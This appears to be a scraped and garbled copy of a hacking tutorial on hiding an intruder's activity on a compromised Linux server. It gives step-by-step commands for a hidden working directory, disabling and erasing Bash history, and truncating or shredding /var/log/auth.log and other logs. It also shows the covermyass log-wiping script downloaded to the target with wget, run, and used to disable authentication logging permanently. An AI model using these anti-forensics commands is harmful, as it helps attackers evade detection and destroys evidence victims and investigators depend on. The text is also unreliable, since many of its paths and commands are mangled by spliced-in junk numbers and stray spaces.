قالب وردپرس درنا توس
Home / Tips and Tricks / How to clear logs and history on Linux systems to cover your tracks and go unnoticed «Null Byte :: WonderHowTo

How to clear logs and history on Linux systems to cover your tracks and go unnoticed «Null Byte :: WonderHowTo



The final stage of exploitation is covering your tracks, which means that all activities and logs are cleared so that the attacker can be prevented from being detected. It is especially crucial for perseverance if the target is to be approached again in the future.

To show you the basics of handling your tracks, we'll first compromise a target and then explore some techniques used to remove Bash history, clear logs and remain hidden after running a Linux -system.

Step 1: Compromising a Target

The first thing to do is exploit the target. We can use command injection to take advantage of the way the server processes OS commands to get a shell.

We will also want to upgrade our new shell to a fully interactive shell. Doing so makes it easier to work in general and we can also use tab completion and terminal history.

Then we can escalate our privileges so that we can take better advantage of the system to go unnoticed.

Step 2: Create an easy-to-delete hidden folder

Once we have root access, we can create a hidden folder to work out and store scripts or files. everyone except the most noobie admin, but another discretion layer certainly wouldn't hurt. First, let's locate all writable directories with the following command:

  root @ target: / # find / -perm -222 -type d 2> / dev / null

/ dev / shm
/ var / lock
/ var / lib / php5
/ var / tmp
/ var / www / dav
/ var / www / twiki / data / Sandbox
/ var / www / twiki / data / Main
/ var / www / twiki / data / Know
/ var / www / twiki / data / TWiki
/ var / www / twiki / data / _default
/ var / www / twiki / data / Trash
/ var / www / twiki / pub / Sandbox
/ var / www / twiki / pub / Main
/ var / www / twiki / pub / Know
/ var / www / twiki / pub / Know / IncorrectDllVersionW32PTH10DLL
/ var / www / twiki / pub / TWiki
/ var / www / twiki / pub / TWiki / TWikiDocGraphics
/ var / www / twiki / pub / TWiki / TWikiTemplates
/ var / www / twiki / pub / TWiki / TWikiLogos
/ var / www / twiki / pub / TWiki / PreviewBackground
/ var / www / twiki / pub / TWiki / FileAttachment
/ var / www / twiki / pub / TWiki / WabiSabi
/ var / www / twiki / pub / Trash
/ var / www / twiki / pub / icn
/ tmp
/tmp/.ICE-unix
We can create a hidden directory with the command  mkdir  and prefix the name with a point: 

  root @ target: / # mkdir / dev / shm / .secret 

mention the contents of / dev / shm, nothing appears:

  root @ target: / # ls -l / dev / shm /

total 0 

Only when we use the switch -a to display all files and folders it will be displayed:

  root @ target: / # ls -la / dev / shm /

total 0
drwxrwxrwt 3 root root 60 2019-06-19 13:49.
drwxr-xr-x 13 root root 13480 2019-06-19 13:41 ..
drwxr-xr-x 2 root root 40 2019-06-19 13:49 .secret 

And to delete the directory once we're done on the machine, use the rmdir command: [19659009] root @target: / # rmdir /dev/shm/.secret/"19659018 ة Step 3: Delete the Bash History

Bash maintains a list of commands used in memory in the current session, so it is important to clear it to hide your tracks We can view the current history with the history command:

  root @ target: / # history

1 cd /
2 ls
3 find / -perm -222 -type d 2> / dev / null
4 cd / dev / shm /
5 cd /
6 mkdir /dev/shm/.secret
7 ls -l / dev / shm /
8 ls -la / dev / shm /
9 ls
10 rmdir /dev/shm/.secret/
11 history 

Commands are written to the HISTFILE environment variable, which is usually .bash_history. We can echo the to see the location:

  root @ target: / # echo $ HISTFILE

We can use the  unset  command to remove the variable: 

  root @ target: / # unset HISTFILE 

So if we echo it again, nothing appears:

  root @ target : / # echo $ HISTFILE 

We can also make sure that the command history is not saved by sending it to / dev / null. Put the variable on it:

  root @ target: / # HISTFILE = / dev / null 

Or do the same with the export command:

  root @ target: / # export HISTFILE = / dev / null [19659010] And the history is now being sent to / dev / null (nowhere): 

  root @ target: / # echo $ HISTFILE

/ dev / null 

We can set the number of commands to be saved during the current session to 0 using the variable HISTSIZE:

  root @ target: / # HISTSIZE = 0 

You can also use the export command use:

  root @ target: / # export HISTSIZE = 0 

We can also change the number of allowed lines in the history file with the variable HISTFILESIZE. Set this to 0:

  root @ target: / # HISTFILESIZE = 0 

Or with export:

  root @ target: / # export HISTFILESIZE = 0 

The command set can also be used to change shell options. Use the following command to disable the history option:

  root @ target: / # set + o history 

And to enable it again:

  root @ target: / # set -o history [19659011Likewisethecommand shopt  can be used to change shell options. Use the following command to disable history: 

  root @ target: / # shopt -ou history 

And to enable it again:

  root @ target: / # shopt -os history 

] While running commands on the target system we can sometimes avoid saving them in history by starting the command with a leading space:

  root @ target: ~ # cat / etc / passwd 

That technique does not always work and depends on the system.

We can also just clear history with the -c switch:

  root @ target: ~ # history -c 

To make the changes written to disk , use the -w switch:

  root @ target: ~ # history -w 

That will only clear history for the current session. To be absolutely sure that history is cleared when you close a session, the following command is useful:

  root @ target: / # cat / dev / null> ~ / .bash_history && history -c && exit 

We can also use the command kill to close the session without saving history:

  root @ target: / # kill -9 $$ 

Step 4: clear the log files

In addition to Bash history, log files must also be cleared to go unnoticed. Here are some common log files and what they contain:

  • /var/log/auth.log Authentication
  • /var/log/cron.log Cron Jobs
  • / var / log / maillog Mail
  • / var / log / httpd Apache

Of course we can easily delete a log with the rm command:

  root @ target: / # rm /var/log/auth.log"19659010] will likely cause red flags, so it's better to empty the file rather than completely delete it We can use the  abbreviation  command to reduce the size to 0: 

  root @ target: / # truncate -s 0 /var/log/auth.logifte19659010"Note, truncation is not always present on all systems. 

We can achieve the same by echoing nothing in the file:

  root @ target: / # echo & # 39; & # 39;> /var/log/auth.log%19659010span And also with >  to empty the file itself: 

  root @ target: / #> /var/log/auth.log%19659010  We can also send it to / dev / null: 

  root @ target : / # cat / dev / null> /var/log/auth.log%19659010unette Or use the  tee  command: 

  root @ target: / # true | tee /var/log/auth.logifte19659010 ة We can also use the  dd  command to write nothing to the log file: 

  root @ target: / # dd if = / dev / null from = / var / log / auth.log

0 + 0 records in
0 + 0 records out
0 bytes (0 B) copied, 6.1494e-05 s, 0.0 kB / s 

The command shred can be used to overwrite a file with meaningless binary data:

  root @ target: / We can even tack on  -zu  which truncates the file and overwrites it with zeros to hide the evidence of fragmentation: 

  root @ target: / # shred -zu / var / log / auth.log {19659018 // Step 5: Use a tool to get things erased 

To increase the chances of any activity on the target going undiscovered, we can use a tool to make sure ensure everything is erased. Covermyass is a script that will automate many of the processes we've already covered, including clearing log files and disabling Bash history.

We can get the script from GitHub with wget (assuming we can access the internet on the target, otherwise it must be manually transferred):

  root @ target: / # wget https : //raw.githubusercontent.com/sundowndev/covermyass/master/covermyass "19659010] Go to a writable folder and use  chmod  to make it executable: 

  root @ target: / tmp # chmod + x covermyass 

Then we can run it:

  root @ target: / tmp # ./covermyass

Welcome to Cover my ass tool!

Choose an option :

1) Clear logs for the user's root
2) Permanently disable the authentication and bash history
3) Restore settings to default
99) Closing tool

> 

We get a custom prompt with a few options to choose from. Let's select the first one to clear the logs:

> 1

[+] / var / log / messages cleaned up.
[+] /var/log/auth.log cleaned.
[+] /var/log/kern.log cleaned.
[+] / var / log / wtmp cleaned.
[+] ~ / .bash_history cleaned up.
[+] History file deleted.

Reminder: You have to reload the session to see effects.
Type exit to do this. 

We can also disable Bash and Auth history with option 2:

> 2

[+] Permanently send /var/log/auth.log to / dev / null
[+] Permanently send bash_history to / dev / null
[+] Set HISTFILESIZE & HISTSIZE to 0
[+] Library for disabled history

Bash log disabled permanently. 

And in case you need to erase everything quickly, add now to the command:

  root @ target: / tmp # ./covermyass now

[+] / var / log / messages cleaned up.
[+] /var/log/kern.log cleaned.
[+] / var / log / wtmp cleaned.
[+] ~ / .bash_history cleaned up.
[+] History file deleted.

Reminder: You have to reload the session to see effects.
Type exit to do this 

Wrapping Up

Today we explored different techniques used to cover tracks and go unnoticed on a compromised machine. We discussed ways to disable and delete Bash history, methods to clear log files and used the Covermyass tool to ensure that our activity on the target was cleared. There are other ways to clear certain traces of an attack, such as with Metasploit, with shell scripting or with a hacked Windows machine, but the above should be all you need for a standard Linux machine.

Don't Miss: How Hackers Hide Their Traces on an Exploited Linux Server with Shell Scripting

Want to Make Money as a White Hat Hacker? Start your White-Hat Hacking career with our Premium Ethical 2020 Hacking Certification Training Bundle from the new Null Byte Shop and receive over 60 hours of training from Ethical Hacking Professionals.

Buy Now (96% Off)>

Cover Image by Vojtech Okenka / Pexels

Source link